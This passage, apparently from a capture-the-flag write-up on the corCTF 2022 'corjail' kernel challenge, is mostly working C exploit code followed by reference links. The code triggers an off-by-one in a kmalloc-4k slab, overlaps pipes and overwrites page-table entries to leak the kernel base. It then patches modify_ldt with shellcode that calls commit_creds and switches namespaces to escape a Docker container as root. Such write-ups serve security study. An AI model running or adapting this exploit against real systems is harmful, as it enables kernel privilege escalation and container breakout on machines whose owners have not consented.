const uint64_t pte_for_modify_ldt =
default_pte_for_kernel_code + (MODIFY_LDT_OFFSET & ~(0xFFF));
modify_ldt_addr =
(uint64_t *)(set_pte(pte_for_modify_ldt) + (MODIFY_LDT_OFFSET & 0xfff));
/*
* Below opcodes are from:
* call get_rip;
* get_rip:
* pop r15;
* sub r15, 0x252f0; // &__x64_sys_modify_ldt - kbase == 0x252f0
* sub r15, 5; // call get_rip; takes 5 bytes
*
* // call commit_creds(&init_cred);
* lea rdi, [r15 + 0x145a960]; // &init_cred - kbase == 0x145a960
* lea rax, [r15 + 0xeba40]; // &commit_creds - kbase == 0xeba40
* call rax;
*
* // task = find_task_by_vpid(1);
* // call switch_task_namespaces(task, &init_nsproxy);
* mov rdi, 1;
* lea rax, [r15 + 0xe4fc0]; // &find_task_by_vpid - kbase == 0xe4fc0
* call rax; // find_task_by_vpid(1)
* mov rdi, rax; // task
* lea rsi, [r15 + 0x145a720]; // &init_nsproxy - kbase == 0x145a720
* lea rax, [r15 + 0xea4e0]; // &switch_task_namespaces - kbase == 0xea4e0
* call rax; // switch_task_namespaces(task, &init_nsproxy);
*
* // current = find_task_by_vpid(pid);
* // current->fs = copy_fs_struct(&init_fs);
* lea rdi, [r15 + 0x1589740]; // &init_fs - kbase == 0x1589740
* lea rax, [r15 + 0x2e7350]; // ©_fs_struct - kbase == 0x2e7350
* call rax; // copy_fs_struct(&init_fs);
* mov rbx, rax; // new_fs
* mov rdi, 0x1111111111111111; // pid: will be fiexed
* lea rax, [r15 + 0xe4fc0]; // &find_task_by_vpid - kbase == 0xe4fc0
* call rax; // current = find_task_by_vpid(pid)
* mov [rax + 0x6e0], rbx; // current->fs = new_fs
*
* // bypass kpti
* xor rax, rax;
* mov [rsp + 0x00], rax;
* mov [rsp + 0x08], rax;
* mov rax, 0x2222222222222222; // user_ip: will be fixed
* mov [rsp + 0x10], rax;
* mov rax, 0x3333333333333333; // user_cs: will be fixed
* mov [rsp + 0x18], rax;
* mov rax, 0x4444444444444444; // user_rflags: will be fixed
* mov [rsp + 0x20], rax;
* mov rax, 0x5555555555555555; // user_sp: will be fixed
* mov [rsp + 0x28], rax;
* mov rax, 0x6666666666666666; // user_ss: will be fixed
* mov [rsp + 0x30], rax;
* lea rax, [r15 + 0xc00f06]; // bypass_kpti - kbase == 0xc00f06
* jmp rax; // bypass_kpti
*/
uint8_t new_modify_ldt_code[] = {
0xE8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x5F, 0x49, 0x81, 0xEF, 0xF0, 0x52,
0x02, 0x00, 0x49, 0x83, 0xEF, 0x05, 0x49, 0x8D, 0xBF, 0x60, 0xA9, 0x45,
0x01, 0x49, 0x8D, 0x87, 0x40, 0xBA, 0x0E, 0x00, 0xFF, 0xD0, 0x48, 0xC7,
0xC7, 0x01, 0x00, 0x00, 0x00, 0x49, 0x8D, 0x87, 0xC0, 0x4F, 0x0E, 0x00,
0xFF, 0xD0, 0x48, 0x89, 0xC7, 0x49, 0x8D, 0xB7, 0x20, 0xA7, 0x45, 0x01,
0x49, 0x8D, 0x87, 0xE0, 0xA4, 0x0E, 0x00, 0xFF, 0xD0, 0x49, 0x8D, 0xBF,
0x40, 0x97, 0x58, 0x01, 0x49, 0x8D, 0x87, 0x50, 0x73, 0x2E, 0x00, 0xFF,
0xD0, 0x48, 0x89, 0xC3, 0x48, 0xBF, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11,
0x11, 0x11, 0x49, 0x8D, 0x87, 0xC0, 0x4F, 0x0E, 0x00, 0xFF, 0xD0, 0x48,
0x89, 0x98, 0xE0, 0x06, 0x00, 0x00, 0x48, 0x31, 0xC0, 0x48, 0x89, 0x04,
0x24, 0x48, 0x89, 0x44, 0x24, 0x08, 0x48, 0xB8, 0x22, 0x22, 0x22, 0x22,
0x22, 0x22, 0x22, 0x22, 0x48, 0x89, 0x44, 0x24, 0x10, 0x48, 0xB8, 0x33,
0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x48, 0x89, 0x44, 0x24, 0x18,
0x48, 0xB8, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x48, 0x89,
0x44, 0x24, 0x20, 0x48, 0xB8, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55,
0x55, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0xB8, 0x66, 0x66, 0x66, 0x66,
0x66, 0x66, 0x66, 0x66, 0x48, 0x89, 0x44, 0x24, 0x30, 0x49, 0x8D, 0x87,
0x06, 0x0F, 0xC0, 0x00, 0xFF, 0xE0};
uint64_t *ptr;
ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code),
"\x11\x11\x11\x11\x11\x11\x11\x11", 8);
*ptr = getpid();
ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code),
"\x22\x22\x22\x22\x22\x22\x22\x22", 8);
*ptr = (uint64_t)get_shell;
ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code),
"\x33\x33\x33\x33\x33\x33\x33\x33", 8);
*ptr = user_cs;
ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code),
"\x44\x44\x44\x44\x44\x44\x44\x44", 8);
*ptr = user_rflags;
ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code),
"\x55\x55\x55\x55\x55\x55\x55\x55", 8);
*ptr = user_sp;
ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code),
"\x66\x66\x66\x66\x66\x66\x66\x66", 8);
*ptr = user_ss;
memcpy(original_modify_ldt_code, modify_ldt_addr,
sizeof(original_modify_ldt_code) - (MODIFY_LDT_OFFSET & 0xfff));
memcpy(modify_ldt_addr, new_modify_ldt_code, sizeof(new_modify_ldt_code));
}
#define SLAB_COUNT 7
int main() {
pin_to_core(0);
save_state();
vuln_fd = open("/proc_rw/cormon", O_RDWR);
if (vuln_fd < 0) {
fatal("open");
}
void *tmpbuf = malloc(0x1000);
uint64_t *uint64_tmpbuf = (uint64_t *)tmpbuf;
FIRST_STEP:
#define RETRY() \
do { \
for (int i = 0; i < pipe_cnt; ++i) { \
close_pipe_at(i); \
} \
sched_yield(); \
puts("\n[*] Retry from first step after 1 seconds\n"); \
sleep(1); \
goto FIRST_STEP; \
} while (0)
puts("[*] Do side-channel for kmalloc-4k slab...");
while (make_kmalloc_4k_slab_full(SLAB_COUNT) < 0) {
puts(" [*] Retry side-channel for kmalloc-4k slab...");
for (int i = 0; i < pipe_cnt; ++i) {
close_pipe_at(i);
}
sched_yield();
}
puts(" [+] Side-channel success");
const size_t target_pipe_idx = SLAB_COUNT * 4 + 4;
puts("[*] Trigger off-by-one...");
sched_yield();
close_pipe_at(target_pipe_idx);
off_by_one_in_kmalloc_4k();
alloc_4k_pipe_at(target_pipe_idx);
sched_yield();
puts("[*] Finding overlapped pipes...");
if (find_overlapped_pipes()) {
puts(" [-] Overlapping seems false positive");
RETRY();
}
printf(" [+] pipe @ %lx and pipe @ %lx are overlapped!\n",
victim_pipe_fds[0], victim_pipe_fds[1]);
puts("[*] Test overlapped pipes");
if (test_overlapped_pipes() < 0) {
puts(" [-] Overlapping seems false positive");
RETRY();
}
puts(" [+] Overlapping is true");
puts("[*] Set pipe's offset to 0x1000 for reading PTEs");
write(pipe_fds[victim_pipe_fds[0]][1], original_ptes, 0x1000);
puts("[*] Spray PTEs...");
spray_ptes_target_to_victim_pipe_page();
puts("[*] Read PTEs");
read(pipe_fds[victim_pipe_fds[0]][0], original_ptes, 0x1000);
if ((original_ptes[0] & PTE_FLAGS_MASK) != 0x8000000000000867) {
puts(" [-] UAF page does not contain PTEs");
RETRY();
}
printf(" [+] UAF page contains PTEs (One of them is 0x%016lx)\n",
original_ptes[0]);
puts("[*] Overwrite PTE to leak physical kernel base");
const uint64_t new_pte_for_dmabuf =
PAGE_DEFAULT_FLAGS | 0x9c000; // dmabuf..? WTF?!
uint64_t *dmabuf_addr = (uint64_t *)set_pte(new_pte_for_dmabuf);
find_corrupted_mmap_addr();
if (corrupted_mmap_addr == (void *)-1) {
puts(" [-] Corrupted mmap addr not found");
RETRY();
}
printf(" [+] Corrupted mmap addr: %p\n", corrupted_mmap_addr);
physical_kernel_base = (*dmabuf_addr & PTE_PFN_MASK) - 0x2004000ULL;
printf(" [+] physical kernel base: 0x%016lx\n", physical_kernel_base);
default_pte_for_kernel_code = physical_kernel_base | PAGE_DEFAULT_FLAGS;
puts("[*] Escaping docker...");
puts(" [*] Patch modify_ldt");
patch_modify_ldt();
puts(" [*] Call patched modify_ldt...");
syscall(SYS_modify_ldt);
puts(" [-] Failed to Escaping docker");
get_enter_to_continue("Press enter to exit...");
return 0;
}Reference⌗
- https://github.com/Crusaders-of-Rust/corCTF-2022-public-challenge-archive/tree/master/pwn/corjail/task
- https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/corCTF/2022/pwn/CoRJail
- https://github.com/isec-tugraz/SLUBStick
- https://github.com/Lotuhu/Page-UAF
- https://ptr-yudai.hatenablog.com/entry/2023/12/07/221333